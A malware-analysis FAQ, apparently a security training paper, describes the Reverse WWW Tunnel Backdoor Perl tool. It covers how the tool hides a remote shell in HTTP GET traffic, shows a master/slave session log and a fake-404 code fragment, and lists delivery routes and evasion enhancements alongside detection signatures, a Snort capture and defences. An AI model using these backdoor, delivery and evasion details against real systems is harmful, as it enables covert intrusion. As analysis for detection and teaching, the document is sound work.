Final Week to Get a MacBook Air or Surface Pro 7 with Online Training - Best Offers of the Year!

Malware FAQ

Malware FAQ: Reverse WWW Tunnel Backdoor

Author: Chris Young

Exploit Details:

Name: Reverse WWW Tunnel Backdoor

Filename: rwwwshell-1_6_perl.txt or

Version: 1.6

Author: van Hauser


Operating system: The product is OS independent as it uses Perl interpreters, however its main focus is Linux, Free BSD and Solaris.

Brief Description: A proof of concept tool that allows an attacker to access commands (typically shell) on a remote server via HTTP, through firewalls.


Reverse WWW tunnel backdoor (RW3) is a tool that facilitates the interaction of two systems through the HTTP protocol. Initially written as a proof of concept script in 1998 by van Hauser the originator of the war dialler THC.

The prime reason for writing the script was to test whether it would be possible to create a tool capable of circumventing firewalls, by camouflaging the communications inside a normal HTTP session.

Written in Perl the original script has gone through a few iterations to reach the current version of 1.6, adding along the way Unix perl portability and Proxy compatibility.

Protocol: HTTP

The script utilises the GET command from the HTTP command set to pass encoded information in a way that looks like natural web browsing traffic.

Typically sitting upon a TCP/IP protocol (port 80), the makeup of HTTP is plain text, and most closely resembles an English high-level programming language.

Description of Variants

There are currently no direct descendants of this program that have been ported to other platforms. This is possibly due to the fact the Perl is represented on many platforms, and as such the script itself does not need to be ported.

There is similar 'C' based competitor product from 'nocrew' that is under more active development called 'http tunnel 3.3' which is capable of tunnelling other protocols through its HTTP connection. More information on this can be found at , and a review of its functionality can be found at

How the exploit works

The script modifies its process name to camouflage its presence on the host computer. By default it uses 'vi', however this function does not work under Windows NT/2000 Pro. If it did 'Explorer' or 'Taskmgr' would be simple to insert and would be more appropriate for a Windows platform.

The script uses $CGI_PREFIX to determine which HTTP command to use to pass information through the firewall. It then appends a Uuencoded message to the end of this command, which is passed to and from STDIN and STDOUT on the Master and Slave systems.

Using the /cgi-bin/ command style prevents the data being cached by proxies, by mimicking the common method for passing parameters to CGI programs. This is to append them to the command line following the '?', character making it look like natural traffic.

Once the master has sent the message to the slave, it executes the required command ($Shell, line 40) and passes the Uudecoded message to it. The output is then collected and after an agreed delay ($Delay, line 41) is passed back in the same fashion.

Common items found in the CGI directory are:
Xbase, Mysql, Form, Common, Status, FCGI, Printenv and test-cgi

Subsequently modifying line 27 to masquerade the HTTP GET request with any of these will make the messages seem more natural and assist in confusing the IDS systems further.

Should anyone attempt to access the server without the script and password, they would get the following error message in an attempt to confuse them:

The error is the result of the following code, which modifies the title and the body text to indicate that the requested file no longer exists.

sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
"<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;


As a means to running the script on a remote system, a certain amount of information needs to be attained:

•  Knowledge of target operating system
•  Is Perl installed?
•  Is a proxy needed?
•  Does the proxy require a password?

Once this information has been ascertained, it is possible to determine the best form of attack.

Direct access: If the system has been compromised earlier, or the attacker has access for some other reason, then the above information is easily gathered, and the script can simply be run with any preferred settings.

Via E-Mail: Sending the script via E-Mail is possibly the most problematic method, as the above information is not so readily available. However it would be possible to gain a reasonable level of success by targeting UNIX based systems, as they have a higher likelihood of having Perl installed.

Another problem is, many UNIX based web servers will have Perl installed, but few users or administrators use these systems for mail retrieval/viewing.

Windows/Intel based systems could be targeted by wrapping the compiled version of the script inside another program (a game etc.) using a tool like Silk . This would have the benefit of not requiring the host system to have a Perl interpreter installed, but would depend on the compilers ability to overcome the Windows problems described further on in this document (see page 14).

How to use the exploit

The original version (v1.6) only took one proper input, that of '-h' for the help text.

Entering any other text after the scripts name would change the default running mode from that of Master to Slave utilising the internal variables defined early in the script for target-address and port etc.

The version that I altered as an aide to understanding the attack method takes the following parameters:

perl Target-addr port
(some systems do not require the preceding 'perl')

Where Target-addr is either the IP address or a FQDN (full qualified domain name) and port is the target port over which to communicate. If no entry is made for port the system assumes port 8080.

For the script to work through firewalls in its intended way it should use ports 80, 8080 or 443, although any will work as long as they are not already allocated on the target or hosts systems.

Many other system modifications are available, such as, Process, User and password. If these were to be converted to function from the command line a proper parser of the $ARGV[n] input should be considered.

Example of a Windows NT Master (attacker) and a Linux system

The following is the output from both the Master and slave for a simple session using

C:\> perl
Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it's output and then
type in your commands to execute on SLAVE. You'll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn't try to view binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don't like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.

Waiting for connect ... connect from unresolved/
[Warning! No output from remote!]
> dir

Waiting for connect ... connect from unresolved/
ghost ntfsdos.exe rmtshare.exe

Waiting for connect ... connect from unresolved/
cd / ; dir

Waiting for connect ... connect from unresolved/
bin dev home lost+found opt root tmp usr
boot etc lib mnt proc sbin tools var

Waiting for connect ... ^C


#perl 8080
starting in slave mode to on port 8080
Items in bold are input from the attacker, and italics are responses from the remote system.

As you can see the first example is a simple 'dir' (Linux accepts this, and I like the formatting) whereas the second example has 'cd / ; dir' demonstrating the systems ability to take multiple commands on one line separated by a ';' (semicolon).

As you would expect, not much happens on the slave (attacked) system to indicate any activity.

Options for change:

Lines 27 through 49 allow for simple changes to the function of the system, they are:




HTTP command use to hide with normal traffic



Name of local command to use in process table



Password to prevent other RW3 slaves using your Master!



Port over which the traffic will initiate



IP address of Master



Command that should run on slave once a connected



Time in seconds to delay output from commands



When connections should be initiated, leave blank for now.



Indicates if the connection should be repeated daily.



IP address of internal proxy server.



Port over which traffic will travel



User ID used to authenticate with the proxy server



Password for above.



Used to enable specific script debugging output.



Fix for AIX and Open BSD recv network problem

There is no easy method for attempting to carry this exploit out by hand, as the server (slave) component needs to be active at the remote site, and by the nature of the tool, it sits and waits for compromised systems to call in.

Signature of the attack

On NT the following are visible when reviewing the Task Manager:

This clearly shows that the $Mask command on line 28 does not effect Windows.

On the Linux system the script shows up in the process table in the following way:

root 1075 1071 0 11:42 pts/0 00:00:00 bash
root 1108 1105 0 11:47 pts/1 00:00:00 bash
root 1196 1075 1 12:28 pts/0 00:00:00 vi
root 1197 1196 0 12:28 pts/0 00:00:00 /bin/sh
root 1198 1108 0 12:29 pts/1 00:00:00 ps -ef
NB: The above table has been cut down to show only the relevant information

In the above table, the attackers process has been hidden behind 'vi' (in bold)

Output from NETSTAT -NA on a Windows NT system:

Active Connections

Proto Local Address Foreign Address State
The above system is a workstation, and as such would not normally have port 80 in listening mode.

The following is the output from netstat -na on a Linux system when is running in master mode (listening for slaves):

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0* LISTEN
A scan of the attack in progress is in Appendix B, with the payload areas in bold.

The following Perl script can be used to extract the password and message from the scan output of Snort.

$test = $ARGV[0];
$test =~ tr/'zcadefghjklmnopqrstuv'
$test =~ tr/'b'/"'"/;
$decoded = unpack "u", "$test";
print stdout $decoded;
NB: file saved as for this test.

Its input is via the command line, and an example is:

perl M5mAl9VAOjW0rdgYT9GvDfWkN97AEdsqR96vY8VQEi

Which give the following output. The first three characters in this case are the password (this may not be the case for all traces, the length is down to the attacker).

THCghost ntfsdos.exe recycled rmtshare.exe

How to protect against it

Utilise password protection on your proxies, and change them regularly.

Using Microsoft Proxy and the authentication methods built into Internet Explorer, although the Winsock proxy client should not be activated, as it supports legacy applications, and would effectively negate the need for the scripts proxy navigation.

Implement good internal security policies and user training.

If your desktop is Windows based, it is possible to restrict the users ability to run unauthorised packages.

Monitor all incoming email and web downloads for the signatures of known attackers tools. This alone would not prevent all of the tools getting in, however it would spike your interest enough to investigate the user in question.

The monitoring of user login times and system access correlation is possible, although the work involved would be quite onerous. This would also suffer from many false positives if users do not logout or simply turn their PC's off at night!

The author suggests using a second network detached from the primary for Internet access, which is impracticable for most organisations, but would obviously work.

Possible enhancements


Compiling the script with any of the following compilers would remove the products reliance on the target system having Perl installed:

IP address cycling

The ability to modify the target IP address on the slave, would further camouflage the packets passing through the firewall and IDS's. Mixing Cdor's ability to sniff packets from the net that are not seemingly intended for it, with IP source routing to an address that passes the Masters interface would allow traversal of a firewall without giving away the real address of the Master.

Passing through frag-router

As an aide to avoiding some IDS's, the packets could be further obscured by forwarding them through FragRouter, which will fragment the packets enough to confuse earlier or less sophisticated IDS's.


Currently the use of HTTP allows administrators to see the actual commands being executed once the attack has been detected, and the logs have been analysed. A transition to HTTPS would prevent such viewing, whilst retaining the nature of the product with respect to traversing firewalls, through masquerading as normal traffic.

Encryption of the payload

Another method to restrict the abilities of administrators to view the contents, would be to pass the desired commands and subsequent output through an encryption package, such as Blowfish, prior to transmission. The resulting encrypted message would then need to be Uuencoded prior to transmission to prevent control characters being transmitted.

Where to get it

As the program is written in Perl, it is possible to simply cut and paste the text from this document into a new document and save it with the usual .pl extension.

NB: The script is in a table, so highlighting the second column and copying it then pasting into notepad etc. will be required.

For the latest version the author suggests however this site was unavailable for the duration of the creation of this document, however the author himself is based at .

The usual repositories retain copies such as:

A number of Perl script interpreters are available from:
although the majority of Linux systems come with it either pre-installed or as some form of package.


The prime dependency is a Perl interpreter, which has the ability to send and receive network packets.

Compatible platforms.

Any platform that supports Perl, however the author has only tested it working on:

•  Linux;
•  Solaris;
•  Open BSD; and
•  AIX.

Although Open BSD and AIX are reported to have problems with 'recv' responses, there is a workaround within the script.

Windows NT and 2000 professional do work as Masters, however the fork() command causes problems when in slave mode. This is discussed later on in the document.

These problems might at some stage be resolved by newer versions of their respective Perl interpreters.

Problems running under Windows

The 'Master' part of the script has no problems working on either Windows NT or Windows 2000 professional, however the 'Slave' portion reports the following errors:

starting in slave mode to on port 8080

Slave activated
Bizarre SvTYPE [193] at line 137.

Which relates to the following line of code:
$pid = fork;

Investigating the implementation of the ActivePerl (5.6.0 build 623) version of Perl, it becomes clear that the fork command is merely emulated under Windows, as it does not directly support use of the fork() command

The following is a quote from the ActivePerl manual:

"On some platforms such as Windows where the fork() system call is not available, Perl can be built to emulate fork() at the interpreter level. While the emulation is designed to be as compatible as possible with the real fork() at the level of the Perl program, there are certain important differences that stem from the fact that all the pseudo child ``processes'' created this way live in the same real process as far as the operating system is concerned."

The script manifests none of these problems under Linux (Red Hat 7) however it does recognise that problems exist with interpretations of Perl, as lines 49,206 and 268 turn on a kludge to get round a problem the author encountered with Open BSD and Solaris.

As the problem exists in the code that attempts to fork a new process, a possible solution would be to accept that the commands run by the attacker might hang the running process and as such remove the attempt to fork. The script would work, however any errors or crashes would stop the remote access. This could be worked round by using the 'at' command to run the script at a specific time instead of relying on the forking process. A side effect of this would be that the command would show up in the 'at' table.

The best solution is to get a version of Perl that works properly with fork() commands or find another method for running the scripts


Overall, a well thought out and executed script that clearly achieves its goal as a proof of concept. The script is reasonably well documented, which lends itself to simple tweaks and enhancements by individuals at all programming levels.

Although it appears development on the product has ceased, the methods it deploys work today and with a few of the suggested improvements could make this a formidably stealthy tool.

The current dependency on Perl interpreters limits the scripts ability to propagate as widely as might be desired, however using the Perl compiler or re-scripting it into C would be a relatively simple task.

With Microsoft seemingly encouraging the use of common port tunnelling by providing developers with code capable of traversing firewalls for control (RPC) calls, it can only be short time before encryption is added to these products and the battle sways in favour of the attacker.

Additional Information

ActiveState ActivePerl HTML manual - Software install required

An interesting article on how to find backdoors in Firewalls can be found at:

NoCrew's HPPT Tunnel software can be found at:

A useful repository of attacker software and information can be found at:

A useful source of security information can be found at:

The inspiration for this document came from a training seminar given at the SANS Baltimore conference by Eric Cole and Edward Skoudis in 2001. Kind permission to extend the information found in the training course was given by Eric Cole.

Appendix - Snort scan

-*> Snort! <*-
Version 1.3.1
By Martin Roesch (,
Decoding Ethernet on interface eth0

07/23-12:16:12.335290 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x5A -> TCP TTL:64 TOS:0x0 ID:100 DF
***PA* Seq: 0xB49761F3 Ack: 0xCF33CA Win: 0x7D78
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 72 64 GET /cgi-bin/ord
65 72 3F 6C 35 6D 41 6C 7A 20 48 54 54 50 2F 31 er?l5mAlz HTTP/1
2E 30 0A 0A .0..

07/23-12:16:12.460256 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:62072 DF
****A* Seq: 0xCF33CA Ack: 0xB4976217 Win: 0x2214
00 00 00 00 00 00 74 A2 57 4D ......t.WM
07/23-12:16:32.343130 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x48 -> TCP TTL:128 TOS:0x0 ID:2681 DF

***PA* Seq: 0xCF33CA Ack: 0xB4976217 Win: 0x2214
62 35 6D 41 6C 39 67 45 52 73 72 74 74 7A 82 1F b5mAl9gERsrttz..
A2 AC ..

07/23-12:16:32.343231 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36 -> TCP TTL:64 TOS:0x0 ID:104 DF
****A* Seq: 0xB4976217 Ack: 0xCF33D8 Win: 0x7D78

07/23-12:16:32.343310 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:2937 DF
*F**A* Seq: 0xCF33D8 Ack: 0xB4976217 Win: 0x2214
00 00 00 00 00 00 D8 01 AD 9A ..........

07/23-12:16:32.343423 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36 -> TCP TTL:64 TOS:0x0 ID:105 DF
****A* Seq: 0xB4976217 Ack: 0xCF33D9 Win: 0x7D78

07/23-12:16:33.353858 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36 -> TCP TTL:64 TOS:0x0 ID:106 DF
*F**A* Seq: 0xB4976217 Ack: 0xCF33D9 Win: 0x7D78

07/23-12:16:33.354093 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:3193 DF
****A* Seq: 0xCF33D9 Ack: 0xB4976218 Win: 0x2214
00 00 00 00 00 00 46 C9 14 97 ......F...

07/23-12:16:38.374391 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x4A -> TCP TTL:64 TOS:0x0 ID:107 DF
S***** Seq: 0xB5FB24A9 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 Opt 4:TS: 380335 0 NOP WS: 0

07/23-12:16:38.374654 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:3449 DF
S***A* Seq: 0xCF998E Ack: 0xB5FB24AA Win: 0x2238
TCP Options => MSS: 1460
00 00 B2 39 47 A4 ...9G.

07/23-12:16:38.374728 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36 -> TCP TTL:64 TOS:0x0 ID:108 DF
****A* Seq: 0xB5FB24AA Ack: 0xCF998F Win: 0x7D78

07/23-12:16:38.375378 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0xAC -> TCP TTL:64 TOS:0x0 ID:109 DF
***PA* Seq: 0xB5FB24AA Ack: 0xCF998F Win: 0x7D78
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 72 64 GET /cgi-bin/ord
65 72 3F 4D 35 6D 41 6C 39 56 41 4F 6A 57 30 72 er?M5mAl9VAOjW0r
64 67 59 54 39 47 76 44 66 57 6B 4E 39 37 41 45 dgYT9GvDfWkN97AE
64 73 71 52 39 36 76 59 38 56 51 45 39 73 74 72 dsqR96vY8VQE9str
6A 46 55 54 6A 56 41 41 6A 46 34 4E 39 37 41 45 jFUTjVAAjF4N97AE
7A 31 64 73 71 52 61 52 59 50 66 73 74 72 6A 47 z1dsqRaRYPfstrjG
6A 53 66 52 59 50 66 74 48 74 7A 20 48 54 54 50 jSfRYPftHtz HTTP
2F 31 2E 30 0A 0A /1.0..

07/23-12:16:38.490980 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:3961 DF
****A* Seq: 0xCF998F Ack: 0xB5FB2520 Win: 0x21C2
00 00 00 00 00 00 06 6B 15 B9 .......k..

07/23-12:17:01.405007 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:12153 DF
***PA* Seq: 0xCF998F Ack: 0xB5FB2520 Win: 0x21C2
6C 35 6D 41 6C 7A 36 83 D0 84 l5mAlz6...